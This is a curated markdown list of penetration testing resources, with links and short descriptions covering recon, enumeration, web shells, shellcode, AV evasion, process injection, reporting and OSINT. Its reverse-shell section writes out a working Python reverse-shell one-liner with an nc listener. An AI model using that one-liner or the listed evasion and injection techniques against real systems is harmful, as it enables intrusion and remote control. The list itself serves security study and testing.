- [IoTSecurity101](https://github.com/V33RU/IoTSecurity101): From IoT Pentesting to IoT Security
- [IoT Pentesting](https://www.iotpentest.com/) and [IoT-PT](https://github.com/IoT-PTv/IoT-PT): A Virtual environment for Pentesting IoT Devices
- [red_team_telemetry](https://github.com/ztgrace/red_team_telemetry)
- [SharpSploitConsole](https://github.com/anthemtotheego/SharpSploitConsole): SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit.
- [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec): A swiss army knife for pentesting networks
- [DarkSpiritz](https://github.com/DarkSpiritz/DarkSpiritz): A penetration testing framework for Linux, MacOS, and Windows systems.
- [proxycannon-ng](https://github.com/proxycannon/proxycannon-ng): A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference
- [PentestHardware](https://github.com/unprovable/PentestHardware): Kinda useful notes collated together publicly
- [MarkBaggett’s gists](https://gist.github.com/MarkBaggett): This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation.
- [Serverless Toolkit for Pentesters](https://blog.ropnop.com/serverless-toolkit-for-pentesters/)
- [pentest_scripts](https://github.com/highmeh/pentest_scripts): scrapes linkedin and generates emails list.
- [Penetration Testing Tools Cheat Sheet ∞](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/): Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test.
- [IVRE](https://ivre.rocks/): Network recon framework ([github](https://github.com/cea-sec/ivre)).
- (pt-br) [DomainInformation](https://github.com/GreyHatsBR/DomainInformation): Tool para a identificação de arquivos, pastas, servidores DNS, E-mail. Tenta fazer transferência de zona, Busca por subdomínios e por ultimo, procura por portas abertas em cada ip dos subdomínios.. Desfrutem =)
- [Spawning a TTY Shell](https://netsec.ws/?p=337): Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system.
- [LeakLooker](https://hackernoon.com/leaklooker-find-open-databases-in-a-second-9da4249c8472): Find Open Databases in Seconds. [github](https://github.com/woj-ciech/LeakLooker)
- [pown-recon](https://github.com/pownjs/pown-recon): A powerful target reconnaissance framework powered by graph theory.
- [Micro8](https://github.com/Micropoor/Micro8): The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source.
- [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings): A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!
- [Penetration Test Guide based on the OWASP + Extra](https://github.com/Voorivex/pentest-guide): This guid is for the penetration testers seeking for the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view including 9 Test Classes and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests which also is useful for the report document. I've also added 15 extra Tests Cases marked by the EXTRA-TEST. I hope it will be useful in both penetration test projects and bug-bounty.
- [Insecure Direct Object References](https://github.com/Voorivex/pentest-guide/tree/master/Insecure-Direct-Object-References) (OTG-AUTHZ-004)
- OWASP ZAP w2019-10-14 released: [pentesting tool for finding vulnerabilities in web applications](https://securityonline.info/owasp-zap-web-app-pentest-tool/).
- [Order of the Overflow Proxy Service](https://github.com/o-o-overflow/dc2019q-ooops)
- [liffy](https://github.com/mzfr/liffy/): Local file inclusion exploitation tool
- [foxyproxy.json](https://gist.github.com/liamosaur/a527d285b5394180c4bf3197dc7d8035): Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter
- [pentest_compilation](https://github.com/adon90/pentest_compilation): Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios.
- [Linux for Pentester](https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation/): ZIP Privilege Escalation
- [Presentation Clickers](https://github.com/marcnewlin/presentation-clickers): Keystroke injection vulnerabilities in wireless presentation clickers.
- [postwoman](https://github.com/liyasthomas/postwoman): alien API request builder - A free, fast, and beautiful alternative to Postman.
- Better API Penetration Testing with Postman:
- [Part 1](https://blog.secureideas.com/2019/03/better-api-penetration-testing-with-postman-part-1.html)
- [Part 2](https://blog.secureideas.com/2019/03/better-api-penetration-testing-with-postman-part-2.html)
- [Part 3](https://blog.secureideas.com/2019/04/better-api-penetration-testing-with-postman-part-3.html)
- [Part 4](https://blog.secureideas.com/2019/06/better-api-penetration-testing-with-postman-part-4.html)
- [DNS and DHCP Recon using Powershell](https://isc.sans.edu/diary/DNS+and+DHCP+Recon+using+Powershell/20995)
- [SiteBroker](https://github.com/Anon-Exploiter/SiteBroker): A cross-platform python based utility for information gathering and penetration testing automation!
- [PENTESTING-BIBLE](https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE): This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources.
- [Nikto](https://github.com/sullo/nikto): web server scanner.
- [Nikto: A Practical Website Vulnerability Scanner](https://securitytrails.com/blog/nikto-website-vulnerability-scanner)
- [NetAss2](https://www.kitploit.com/2019/11/netass2-network-assessment-assistance.html): [Network Assessment Assistance Framework](https://github.com/zerobyte-id/NetAss2).
- [CSS Injection Primitives](https://x-c3ll.github.io/posts/CSS-Injection-Primitives/)
- [physical-docs](https://github.com/trustedsec/physical-docs): This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments.
- [pentest-tools](https://github.com/gwen001/pentest-tools): Custom pentesting tools.
- [HACKING WITH ENVIRONMENT VARIABLES](https://www.elttam.com/blog/env/#content): Interesting environment variables to supply to scripting language interpreters
- [rootend](https://github.com/twelvesec/rootend): A *nix Enumerator & Auto Privilege Escalation tool.
- [DroneSploit](https://github.com/dhondta/dronesploit): Drone pentesting framework console.
- [HAck Tricks](https://book.hacktricks.xyz/pentesting-methodology)([Pentesting Methodology](https://github.com/carlospolop/hacktricks)): Here you will find the typical flow that you should follow when pentesting one or more machines.
- [Huawei_Thief](https://github.com/Zeyad-Azima/Huawei_Thief): Huawei DG8045 & HG633 Devices Exploitation Tool
- [urldozer](https://github.com/offensivedev/urldozer): Perform operations on URLs like extracting paths, parameter names and/or values, domain name, host name (without HTTP[s]).
- [Pentesting Cheatsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets)
- [Snaffler](https://github.com/SnaffCon/Snaffler): a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax )
- [Several ways to download and execute malicious codes (LOLBAS)](https://mp.weixin.qq.com/s/pz6y8299gMUOgtZjZv5puw)
- [coregen.exe](https://strontic.github.io/xcyclopedia/library/coregen.exe-3BF709AEDF5042C39515756FB72E9EC0.html)
- [Jok3r](https://github.com/koutto/jok3r): Network and Web Pentest Automation Framework. [site](https://www.jok3r-framework.com/)
- [Penetration Testing Cheat Sheet](https://github.com/ivan-sincek/penetration-testing-cheat-sheet)
- [BBT](https://github.com/m4ll0k/Bug-Bounty-Toolz)- Bug Bounty Tools
- [P4wnP1 A.L.O.A.](https://github.com/RoganDawes/P4wnP1_aloa) by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".
- [AriaCloud](https://github.com/iknowjason/AriaCloud): A Docker container for remote penetration testing.
- [RustScan](https://github.com/RustScan/RustScan): The Modern Day Port Scanner.
- [Impacket](https://github.com/SecureAuthCorp/impacket): is a collection of Python classes for working with network protocols.
- [fiddler](https://www.telerik.com/fiddler/fiddlercap): Capturing web traffic logs
- [SecLists](https://github.com/danielmiessler/SecLists): is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
- [21 - Pentesting FTP](https://book.hacktricks.xyz/pentesting/pentesting-ftp)
- [PwnWiki.io](http://pwnwiki.io/#!index.md) is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained. [The notes section of the pentesters mind.](https://github.com/pwnwiki/pwnwiki.github.io/)
- [post-exploitation](https://github.com/mubix/post-exploitation): Post Exploitation Collection.
- [Proxyjump, the SSH option you probably never heard of](https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464)
- [GLORP](https://github.com/denandz/GLORP): A CLI-based HTTP intercept and replay proxy
- [Sec4US's cheatsheets](https://sec4us.com.br/cheatsheet/): a lot of [cheatsheets](https://github.com/sec4us-training/cheatsheets) about shellcoding and bufferoverflow.
- [Pentesting 101: Working With Exploits](https://www.infosecmatter.com/pentesting-101-working-with-exploits/)
- [SMB AutoRelay](https://github.com/chesire-cat/smbAutoRelay): SMB Auto Relay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments.
- [Decoder++](https://github.com/bytebutcher/decoder-plus-plus): An extensible application for penetration testers and software developers to decode/encode data into various formats.
- [SCShell](https://github.com/Mr-Un1k0d3r/SCShell): Fileless lateral movement tool that relies on ChangeServiceConfigA to run command.
- [bulwark](https://github.com/softrams/bulwark): An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports.
- [A Noob Guide to setup your Own OOB DNS Server](https://0xspade.medium.com/a-noob-guide-to-setup-your-own-oob-dns-server-870d9e05b54a): [Out-of-Band DNS Bind Server](https://github.com/JuxhinDB/OOB-Server): A Bind9 server for pentesters to use for Out-of-Band vulnerabilities.
- [Interactsh](https://github.com/projectdiscovery/interactsh): An OOB interaction gathering server and client library.
- [DNSLOG](https://github.com/sry309/dnslog-2): dnslog dns / dns rebinding platform.
- [Pre-engagement](http://www.pentest-standard.org/index.php/Pre-engagement)
- [pentest, should I do it?](https://diegoalbuquerque-65111.medium.com/pentest-fazer-ou-n%C3%A3o-fazer-fe693b8d34df)
- [White Box Penetration Testing: “Cheating” in order to boost impact and value](https://ualvesdias.medium.com/white-box-penetration-testing-cheating-in-order-to-boost-impact-and-value-939e96b77331)
- [Weird Proxies](https://github.com/GrrrDog/weird_proxies): Reverse proxies cheatsheet
- [Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal.](https://twitter.com/_dirkjan/status/1381591080207015936)
- [pwncat](https://github.com/cytopia/pwncat): netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
- [From Python to .Net](https://isc.sans.edu/forums/diary/From+Python+to+Net/27366/)
- [offensiveph](https://github.com/RedSection/OffensivePH): use old Process Hacker driver to bypass several user-mode access controls.
- [Penetration Testing - An Introduction](https://www.circl.lu/services/pentest-training-materials/) by cirl.lu.
- [mitmproxy](https://github.com/mitmproxy/mitmproxy): [An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers](https://mitmproxy.org/).
- [Poor Man's Pentest](https://github.com/JohnHammond/poor-mans-pentest): This a collection of the code that I have written for the Poor Man's Pentest presentation.
- [Operator's Decalogue](https://blog.sektor7.net/#!res/2021/opdec.md)
- Living Off Trusted Sites ([LOTS](https://lots-project.com/)) Project: Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allow attackers to use their domain or subdomain.
- [Filesec.io](https://filesec.io/): Stay up-to-date with the latest file extensions being used by attackers.
- [EMBArk](https://github.com/e-m-b-a/embark): The firmware security scanning environment
- [EMBA](https://github.com/e-m-b-a/emba): The security analyzer for embedded device firmware.
- [OffensiveNim](https://github.com/byt3bl33d3r/OffensiveNim): My experiments in weaponizing Nim.
- [White Box Penetration Testing: “Cheating” in order to boost impact and value](https://hackermindset.me/white-box-penetration-testing-cheating-in-order-to-boost-impact-and-value-939e96b77331)
- [Python Penetration Testing Cheat Sheet](https://www.lifars.com/knowledge-center/python-penetration-testing-cheat-sheet/)

### Reconnaissance

- [Automated Reconnaissance Pipeline](https://github.com/epi052/recon-pipeline): An automated target reconnaissance pipeline.
- [PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL](https://blog.stealthbits.com/performing-domain-reconnaissance-using-powershell)
- [subfinder](https://github.com/projectdiscovery/subfinder) is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
- [urlhunter](https://github.com/utkusen/urlhunter): a recon tool that allows searching on URLs that are exposed via shortener services
- [URLBrute](https://github.com/ReddyyZ/urlbrute): Directory/Subdomain scanner developed in GoLang.
- [degoogle](https://github.com/deepseagirl/degoogle): search Google and extract results directly. skip all the click-through links and other sketchiness.
- [Investigator](https://github.com/abhijithb200/investigator): An online handy-recon tool.

### Enumeration

- [linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration): Linux enumeration tool for pentesting and CTFs with verbosity levels
- [Ethical Hacking Course: Enumeration Theory](http://gotowebsecurity.com/ethical-hacking-course-enumeration-theory/)
- [Sublist3r](https://github.com/aboul3la/Sublist3r): Fast subdomains enumeration tool for penetration testers
- [subscraper](https://github.com/m8r0wn/subscraper): External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps.
- [massh-enum](https://github.com/trimstray/massh-enum): OpenSSH 7.x Mass Username Enumeration.
- [LinEnum](https://github.com/rebootuser/LinEnum): Scripted Local Linux Enumeration & Privilege Escalation Checks
- [linpostexp](https://github.com/reider-roque/linpostexp): Linux post exploitation enumeration and exploit checking tools
- [Social Mapper](https://www.kitploit.com/2018/08/social-mapper-social-media-enumeration.html) - A Social Media Enumeration & Correlation Tool. [github repo](https://github.com/SpiderLabs/social_mapper)
- [The art of subdomain enumeration](https://github.com/appsecco/the-art-of-subdomain-enumeration): This repository contains all the supplement material for the book "The art of sub-domain enumeration".
- [social_mapper](https://github.com/SpiderLabs/social_mapper): A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
- [LEGION](https://github.com/carlospolop/legion) - Automatic Enumeration Tool
- [discover](https://github.com/leebaird/discover) - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
- [Z/OS System Enumeration Scripts](https://github.com/mainframed/Enumeration): PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL.
- [WPExploitation](https://github.com/lgcarmo/WPExploitation): simples scripts to help windows enumeration.
- [CTFR](https://github.com/UnaPibaGeek/ctfr) does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs.
- [feroxbuster](https://github.com/epi052/feroxbuster): A fast, simple, recursive content discovery tool written in Rust.
- [grinder](https://github.com/sdnewhop/grinder): Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys)
- [Admin-Scanner](https://github.com/swam-htet-a/Admin-Scanner): This tool is to design to find admin panel of websites.
- [Virtual host scanner](https://github.com/jobertabma/virtual-host-discovery): A script to enumerate virtual hosts on a server.
- [vhost-brute](https://github.com/gwen001/vhost-brute): A PHP tool to brute force vhost configured on a server.
- [grab_beacon_config](https://github.com/whickey-r7/grab_beacon_config): nmap strip to get beacon info.
- [assetfinder](https://github.com/tomnomnom/assetfinder): Find domains and subdomains related to a given domain.
- Wordlists:
- [hackerone_wordlist](https://github.com/xyele/hackerone_wordlist): The wordlists that have been compiled using disclosed reports at HackerOne bug bounty platform
- [paths wordlists](https://gist.github.com/caioluders/e110a5b97d30908475a3f3c176b344e4)
- [subdomains wordlists](https://gist.github.com/caioluders/bae710dba054c349d4d82ce06a72fb5c)
- [parameters wordlists](https://gist.github.com/caioluders/79d494166fc7dad18345f2418704929d)
- [How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists](https://www.eff.org/deeplinks/2018/08/dragon-con-diceware)
- [Assetnote Wordlists](https://wordlists.assetnote.io/): When performing security testing against an asset, it is vital to have [high quality wordlists](https://github.com/assetnote/wordlists) for content and subdomain discovery.
- [Duplicut](https://github.com/nil0x42/duplicut): Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking)
- [Weakpass](https://weakpass.com/wordlist) rule-based online generator to create a wordlist based on a set of words entered by the user. [Kraker](https://github.com/zzzteph/kraker) is a distributed password brute-force system that focused on easy use.
- [Collection of some common wordlists such as RDP password, user name list, ssh password wordlist for brute force. IP Cameras Default Passwords.](https://github.com/jeanphorn/wordlist)
- [Default IoT Username/password](https://pastebin.com/LMuD0LGa)
- [Elpscrk](https://github.com/D4Vinci/elpscrk): An Intelligent wordlist generator based on user profiling, permutations, and statistics. (Named after the same tool in Mr.Robot series S01E01).
- [Ghost Eye](https://github.com/BullsEye0/ghost_eye) Informationgathering Footprinting Scanner and Recon Tool Release. Ghost Eye is an Information Gathering Tool I made in python 3. To run Ghost Eye, it only needs a domain or ip. Ghost Eye can work with any Linux distros if they support Python 3. Author: Jolanda de Koff
- [SuperEnum](https://github.com/p4pentest/SuperEnum): This script does the basic enumeration of any open port along with screenshots.
- [Domain Dossier](https://centralops.net/co/): The Domain Dossier tool generates reports from public records about domain names and IP addresses to help solve problems, investigate cybercrime, or just better understand how things are set up.
- [X41 BeanStack](https://beanstack.io/): Java Fingerprinting using Stack Traces
- [Skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty): Dangerously fast DNS/network/port scanner.
- [TireFire](https://github.com/CoolHandSquid/TireFire): Automate the scanning and enumeration of machines externally while maintaining complete control over scans shot to the target. Comfortable GUI-ish platform. Great for OSCP/HTB type Machines as well as penetration testing.
- [OS Fingerprinting using NTP](https://isc.sans.edu/diary/29394)

### WebShells

- [novahot](https://github.com/chrisallenlane/novahot):A webshell framework for penetration testers.
- [Weevely](https://github.com/epinna/weevely3): Weaponized web shell
- [Did you know that Python's simple web server can run CGI scripts](https://twitter.com/MarkBaggett/status/1327680468146384898)
- [Web-Shells](https://github.com/jbarcia/Web-Shells): (mostly php)

### ShellCodes

- [Why is My Perfectly Good Shellcode Not Working?](https://blog.senr.io/blog/why-is-my-perfectly-good-shellcode-not-working-cache-coherency-on-mips-and-arm): Cache Coherency on MIPS and ARM.
- [shellcode2asmjs](https://github.com/rh0dev/shellcode2asmjs): Automatically generate ASM.JS JIT-Spray payloads
- [Shellen](https://github.com/merrychap/shellen):Interactive shellcoding environment to easily craft shellcodes
- [C-S1lentProcess1njector](https://github.com/s1egesystems/C-S1lentProcess1njector): Process Injector written in C that scans for target processes, once found decrypts RC4 encrypted shellcode and injects/executes in target process' space with little CPU & Memory usage.
- Windows:
- [Unicorn](https://github.com/trustedsec/unicorn) is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.
- [pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode): Converts PE into a shellcode
- [stager.dll](https://github.com/phackt/stager.dll): Code from this [article](https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/)
- [ThreadBoat](https://github.com/cutesunshine/ThreadBoat): Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
- [Excel4-DCOM](https://github.com/outflanknl/Excel4-DCOM): PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe).
- [MaliciousMacroMSBuild](https://github.com/infosecn1nja/MaliciousMacroMSBuild): Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.
- [SnapLoader](https://gitlab.com/ORCA666/snaploader): Injecting shellcode into 'ntdll.dll' address space in target process, and hijacking its thread without calling GetThreadContext, evading memory scanners, and more ...
- Linux:
- [Linux x86 Reverse Shell Shellcode](https://exploit.kitploit.com/2018/01/linux-x86-reverse-shell-shellcode.html)
- [mem-loader.asm](https://gist.github.com/zznop/0117c24164ee715e750150633c7c1782): Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by [x-c3ll](https://x-c3ll.github.io/posts/fileless-memfd_create/)
- [Shellab](https://github.com/TheSecondSun/Shellab/): Linux and Windows shellcode enrichment utility
- [ShellcodeWrapper](https://github.com/Arno0x/ShellcodeWrapper): Shellcode wrapper with encryption for multiple target languages
- [Fully (auto) interactive TTY shells](https://blog.polverari.com.br/posts/full-auto-interactive-tty/)
- Reverse Shell:
- [I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch)](https://twitter.com/wolfniya/status/1064465658614874112): nc -lnvp 1234 / python3 -c "# 107, single statement, non-blocking __import__("subprocess").Popen("sh",0,None,*[ __import__("socket").create_connection(("127.0.0.1",1234))]*3)" or "# 98, separators, blocking import subprocess as S,socket; S.run("sh",0,None,*[ socket.create_connection(("127.0.0.1",1234))]*3)"
- [python-pty-shells](https://github.com/infodox/python-pty-shells/): Python PTY backdoors - full PTY or nothing!
- [Powershell HTTP/S Reverse Shell](https://github.com/3v4Si0N/HTTP-revshell): Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware.
- [HTTP/S Asynchronous Reverse Shell](https://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell): (POC) Asynchronous reverse shell using the HTTP protocol.
- [powershell reverse shell one-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3) by Nikhil SamratAshok Mittal @samratashok
- [Reverse Shell Cheat Sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
- [Reverse Shell Generator](https://weibell.github.io/reverse-shell-generator/) [repo](https://github.com/weibell/reverse-shell-generator)
- [How to Execute Shell Commands with Python](https://janakiev.com/blog/python-shell-commands/)
- [Reverse Shell to fully interactive](https://oscp.infosecsanyam.in/shells/reverse-shell-to-fully-interactive)
- [Single-Line Web Shell](https://leons.im/posts/single-line-web-shell/)
- [Simple-Backdoor-One-Liner.php](https://gist.github.com/sente/4dbb2b7bdda2647ba80b)
- [reverse shell](https://github-wiki-see.page/m/dvanmosselbeen/security-cheat-sheet/wiki/reverse-shell)
- [Spawning reverse shells](https://0x00sec.org/t/spawning-reverse-shells/2133)
- [Spawning interactive reverse shells with TTY](https://medium.com/@6c2e6e2e/spawning-interactive-reverse-shells-with-tty-a7e50c44940e)
- [Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells)
- [shellver](https://github.com/0xR0/shellver): Reverse Shell Cheat Sheet TooL
- [GTRS](https://github.com/mthbernardes/GTRS): GTRS - Google Translator Reverse Shell
- [Using tmux for automating interactive reverse shells](https://infosecwriteups.com/using-tmux-for-automating-interactive-reverse-shells-630260740af3)
- [USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV](https://hausec.com/2020/10/30/using-a-c-shellcode-runner-and-confuserex-to-bypass-uac-while-evading-av/)
- [New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!](https://twitter.com/ptswarm/status/1302966718227189761?s=09)
- (pt-br) [Usando a pwntools para Binary Exploitation](https://diegoalbuquerque.github.io/binary-exploitation-with-pwntools.html)
- [CallObfuscator](https://github.com/d35ha/CallObfuscator): Obfuscate specific windows apis with different apis
- [vba-obfuscator](https://github.com/bonnetn/vba-obfuscator): 2018 School project - PoC of malware code obfuscation in Word macros
- [ProcessInjection](https://github.com/3xpl01tc0d3r/ProcessInjection): This program is designed to demonstrate various process injection techniques.
- [Ten process injection techniques: A technical survey of common and trending process injection techniques](https://www.elastic.co/pt/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process)
- [shellcoding using env variables](https://www.offensivethink.com/inserting-shellcode-by-enviroment.html)
- [From a C project, through assembly, to shellcode](https://vxug.fakedoma.in/papers/VXUG/Exclusive/FromaCprojectthroughassemblytoshellcodeHasherezade.pdf)
- [Writing and Compiling Shellcode in C](https://www.ired.team/offensive-security/code-injection-process-injection/writing-and-compiling-shellcode-in-c)
- [Using ICMP to deliver shellcode](https://blog.romanrii.com/using-icmp-to-deliver-shellcode)
- [Buffer Overflow Windows - EGGHUNTER cheatsheet](https://sec4us.com.br/cheatsheet/bufferoverflow-egghunting).
- [metasploit, x86/alpha_mixed and Windows 7 are killing me](https://brundlelab.wordpress.com/2011/02/04/metasploit-x86alpha_mixed-and-windows-7-are-killing-me/)
- [Some lessons learned along the way to Buffer Overflow](https://www.offensivethink.com/buffer-overflow-insights.html)
- [Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1](https://philkeeble.com/exploitation/windows/Vulnserver-Walkthrough-Part-1/)
- [Resolving API addresses in memory](https://modexp.wordpress.com/2017/01/15/shellcode-resolving-api-addresses/)
- [Locating Kernel32 Base Address](https://blog.xenoscr.net/Locating-Kernel32-Base-Address/)
- [Finding Kernel32 Base and Function Addresses in Shellcode](https://www.ired.team/offensive-security/code-injection-process-injection/finding-kernel32-base-and-function-addresses-in-shellcode)
- [Basics of Windows shellcode writing](https://idafchev.github.io/exploit/2017/09/26/writing_windows_shellcode.html)
- [Shellcodes database for study cases](http://shell-storm.org/shellcode/)
- [Return Oriented Programming (ROP) Attacks](https://resources.infosecinstitute.com/topic/return-oriented-programming-rop-attacks/)
- Gadgets:
- [ROPgadget Tool](https://github.com/JonathanSalwan/ROPgadget)
- [RETURN ORIENTED PROGRAMMING (ROP)](https://01.org/blogs/cbae1/2017/return-oriented-programming-rop)
- [ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes](https://dl.acm.org/doi/10.1145/2995306.2995309)
- [one_gadget](https://github.com/david942j/one_gadget): The best tool for finding one gadget RCE in libc.so.6.
- [JOP ROCKET](https://github.com/Bw3ll/JOP_ROCKET): The Jump-oriented Programming Reversing Open Cyber Knowledge Expert Tool, or JOP ROCKET, is a tool designed to help facilitate JOP gadget discovery in an x86 Windows environment.
- [A fun trick for running shellcode directly from bash](https://twitter.com/David3141593/status/1386438123647868930)
- [Polyglot Assembly](https://vojtechkral.github.io/blag/polyglot-assembly/): Writing assembly code that runs on multiple architectures.
- [Shellcode Injection Techniques](https://github.com/plackyhacker/Shellcode-Injection-Techniques): A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some techniques are better than others at bypassing AV.
- [Simple Shellcode Tale!](https://www.offensivethink.com/shellcoding-and-basics.html) [Segmentation Fault ao executar o shellcode](https://www.notion.so/Segmentation-Fault-ao-executar-o-shellcode-1341182f023846ec9ad4da5b1729f7aa)
- [Linux x86 execve("/bin/sh") - 28 bytes](http://shell-storm.org/shellcode/files/shellcode-811.php)
- [ShellCode Tester](https://github.com/helviojunior/shellcodetester): An application to test windows and linux shellcodes.
- [Windows/x86 Dynamic Bind Shell / Null-Free Shellcode](https://packetstormsecurity.com/files/156148/Windows-x86-Dynamic-Bind-Shell-Null-Free-Shellcode.html)
- [Core](https://github.com/mobdk/Core): Core bypass Windows Defender and execute any binary converted to shellcode.
- (pt-br) [Encontrando endereço da função dinamicamente. Análise da biblioteca block_api](helviojunior.com.br/it/security/criacao-de-exploits/shellcoding-encontrando-endereco-da-funcao-dinamicamente-analise-da-biblioteca-block_api/)
- [Ninja UUID Shellcode Runner](https://github.com/boku7/Ninja_UUID_Runner): Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!
- [IPFuscator](https://github.com/vysecurity/IPFuscator): A tool to automatically generate alternative IP representations
- [Shellcode Mutator](https://github.com/nettitude/ShellcodeMutator): Mutate nasm assembly source files using no-instruction sets (such as nops) to avoid signatures.

### Reporting

- [public-pentesting-reports](https://github.com/juliocesarfort/public-pentesting-reports).
Curated list of public penetration test reports released by several consulting firms and academic security groups
- [report-ng](https://github.com/hvqzao/report-ng): Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
- [PandocPentestReport](https://github.com/herrfeder/PandocPentestReport): This repository shows my effort to create a pandoc based pentest report template.
- [Technical Report template](https://github.com/OR-Bologna/tech-report-template): LaTeX template for technical reports
- [TryHackMe. Breaking Into the Kenobi Machine.](https://medium.com/bugbountywriteup/tryhackme-breaking-into-the-kenobi-machine-c569c4e2c625)
- [PwnDoc](https://pwndoc.github.io/pwndoc/): [PwnDoc](https://github.com/pwndoc/pwndoc) is a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report.
- [This is how you can deliver true value through your pentest reports](https://ualvesdias.medium.com/this-is-how-you-can-deliver-true-value-through-your-pentest-reports-3c329372f556)
- [Offensive Security Exam Report Template in Markdown](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown): Markdown Templates for Offensive Security OSCP, OSWE, OSCE, OSEE, OSWP exam report.
- [A List of Post-mortems!](https://github.com/danluu/post-mortems): A collection of postmortems. Sorry for the delay in merging PRs!

### OSINT - Open Source INTelligence

- [Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19.](https://github.com/g-solaria/OSINTforPenTests)
- [OSINT tool for visualizing relationships between domains, IPs and email addresses.](https://hackernoon.com/osint-tool-for-visualizing-relationships-between-domains-ips-and-email-addresses-94377aa1f20a)
- [sn0int](https://github.com/kpcyrd/sn0int): Semi-automatic OSINT framework and package manager
- A Pentester’s Guide – Part 1: [OSINT – Passive Recon and Discovery of Assets](https://www.sequoiacybersolutions.com/a-pentesters-guide-part-1-osint-passive-recon-and-discovery-of-assets/)
- A Pentester’s Guide - Part 2: [OSINT – LinkedIn is Not Just for Jobs](https://www.sequoiacybersolutions.com/a-pentesters-guide-part-2-osint-linkedin-is-not-just-for-jobs/)
- [iKy](https://gitlab.com/kennbroorg/iKy): I Know You (OSINT project)
- [Gitrob](https://github.com/michenriksen/gitrob): Putting the Open Source in OSINT
- [OSint Tools](https://start.me/p/wMdQMQ/tools): On this page you’ll find tools which you can help do your OSINT reseach.
